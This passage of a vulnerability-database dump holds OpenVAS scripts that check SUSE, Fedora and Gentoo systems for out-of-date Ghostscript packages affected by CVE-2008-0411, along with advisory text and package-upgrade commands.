security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~8.15.3~18.13\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-omni\", rpm:\"ghostscript-omni~8.15.3~18.13\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.7~62.14.6\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~8.15.3~18.13\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~8.15.3~18.13\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~8.15.3~18.13\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~8.15.3~18.13\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.7~62.13.6\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLES9\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~7.07.1rc1~195.11\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~7.07.1rc1~195.11\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~7.07.1rc1~195.11\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~7.07.1rc1~195.11\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-serv\", rpm:\"ghostscript-serv~7.07.1rc1~195.11\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~7.07.1rc1~195.11\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.6~46.10\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.6~46.10\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~8.15.3~18.13\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-omni\", rpm:\"ghostscript-omni~8.15.3~18.13\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.7~62.14.6\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~8.15.3~18.13\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~8.15.3~18.13\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~8.15.3~18.13\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~8.15.3~18.13\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.7~62.13.6\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"LES10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~7.07.1rc1~195.11\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~7.07.1rc1~195.11\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~7.07.1rc1~195.11\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~7.07.1rc1~195.11\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-serv\", rpm:\"ghostscript-serv~7.07.1rc1~195.11\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~7.07.1rc1~195.11\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.6~46.10\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.6~46.10\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~8.15.3~18.13\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-omni\", rpm:\"ghostscript-omni~8.15.3~18.13\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.7~62.14.6\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~8.15.3~18.13\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~8.15.3~18.13\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~8.15.3~18.13\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~8.15.3~18.13\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.7~62.13.6\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLDk9\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~7.07.1rc1~195.11\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~7.07.1rc1~195.11\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~7.07.1rc1~195.11\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~7.07.1rc1~195.11\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-serv\", rpm:\"ghostscript-serv~7.07.1rc1~195.11\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~7.07.1rc1~195.11\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.6~46.10\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.6~46.10\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~8.15.3~18.13\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-omni\", rpm:\"ghostscript-omni~8.15.3~18.13\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.7~62.14.6\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~8.15.3~18.13\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~8.15.3~18.13\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~8.15.3~18.13\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~8.15.3~18.13\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.7~62.13.6\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLESDk10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~7.07.1rc1~195.11\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~7.07.1rc1~195.11\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~7.07.1rc1~195.11\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~7.07.1rc1~195.11\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-serv\", rpm:\"ghostscript-serv~7.07.1rc1~195.11\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~7.07.1rc1~195.11\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.6~46.10\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.6~46.10\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~8.15.3~18.13\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-omni\", rpm:\"ghostscript-omni~8.15.3~18.13\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.7~62.14.6\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~8.15.3~18.13\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~8.15.3~18.13\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~8.15.3~18.13\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~8.15.3~18.13\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.7~62.13.6\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SL10.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-other\", rpm:\"ghostscript-fonts-other~8.15.3~18.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-rus\", rpm:\"ghostscript-fonts-rus~8.15.3~18.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-fonts-std\", rpm:\"ghostscript-fonts-std~8.15.3~18.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-library\", rpm:\"ghostscript-library~8.15.3~18.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-omni\", rpm:\"ghostscript-omni~8.15.3~18.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ghostscript-x11\", rpm:\"ghostscript-x11~8.15.3~18.13\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint\", rpm:\"libgimpprint~4.2.7~62.13.6\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.7~62.14.6\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:56:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libgimpprint-devel\n ghostscript-x11\n ghostscript-serv\n libgimpprint\n ghostscript-fonts-other\n ghostscript-library\n ghostscript-fonts-std\n ghostscript-fonts-rus\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021790 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65147", "href": "http://plugins.openvas.org/nasl.php?oid=65147", "type": "openvas", "title": "SLES9: Security update for Ghostscript", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5021790.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Ghostscript\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libgimpprint-devel\n ghostscript-x11\n ghostscript-serv\n libgimpprint\n ghostscript-fonts-other\n ghostscript-library\n ghostscript-fonts-std\n ghostscript-fonts-rus\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5021790 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65147);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2008-0411\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for Ghostscript\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libgimpprint-devel\", rpm:\"libgimpprint-devel~4.2.6~46.10\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "description": "Check for the Version of ghostscript", "modified": "2017-07-10T00:00:00", "published": "2009-02-16T00:00:00", "id": "OPENVAS:860469", "href": "http://plugins.openvas.org/nasl.php?oid=860469", "type": "openvas", "title": "Fedora Update for ghostscript FEDORA-2008-2084", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ghostscript FEDORA-2008-2084\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ghostscript is a set of software that provides a PostScript(TM)\n interpreter, a set of C procedures (the Ghostscript library, which\n implements the graphics capabilities in the PostScript language) and\n an interpreter for Portable Document Format (PDF) files. Ghostscript\n translates PostScript code into many common, bitmapped formats, like\n those understood by your printer or screen. Ghostscript is normally\n used to display PostScript files and to print PostScript files to\n non-PostScript printers.\n\n If you need to display PostScript files or print them to\n non-PostScript printers, you should install ghostscript. If you\n install ghostscript, you also need to install the ghostscript-fonts\n package.\";\n\ntag_affected = \"ghostscript on Fedora 7\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-March/msg00207.html\");\n script_id(860469);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-16 16:22:52 +0100 (Mon, 16 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2008-2084\");\n script_cve_id(\"CVE-2008-0411\");\n script_name( \"Fedora Update for ghostscript FEDORA-2008-2084\");\n\n script_summary(\"Check for the Version of ghostscript\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ghostscript\", rpm:\"ghostscript~8.15.4~4.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200803-14.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:60517", "href": "http://plugins.openvas.org/nasl.php?oid=60517", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200803-14 (ghostscript)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A stack-based buffer overflow has been discovered in Ghostscript, allowing\narbitrary code execution.\";\ntag_solution = \"All Ghostscript ESP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/ghostscript-esp-8.15.4-r1'\n\nAll Ghostscript GPL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/ghostscript-gpl-8.61-r3'\n\nAll Ghostscript GNU users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/ghostscript-gnu-8.60.0-r2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200803-14\nhttp://bugs.gentoo.org/show_bug.cgi?id=208999\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200803-14.\";\n\n \n\nif(description)\n{\n script_id(60517);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2008-0411\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200803-14 (ghostscript)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/ghostscript-esp\", unaffected: make_list(\"ge 8.15.4-r1\"), vulnerable: make_list(\"lt 8.15.4-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"app-text/ghostscript-gpl\", unaffected: make_list(\"ge 8.61-r3\"), vulnerable: make_list(\"lt 8.61-r3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"app-text/ghostscript-gnu\", unaffected: make_list(\"ge 8.60.0-r2\"), vulnerable: make_list(\"lt 8.60.0-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0411"], "description": "Check for the Version of ghostscript", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:1361412562310880187", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880187", "type": "openvas", "title": "CentOS Update for ghostscript CESA-2008:0155 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ghostscript CESA-2008:0155 centos4 x86_64\n#\n# Authors:\n# 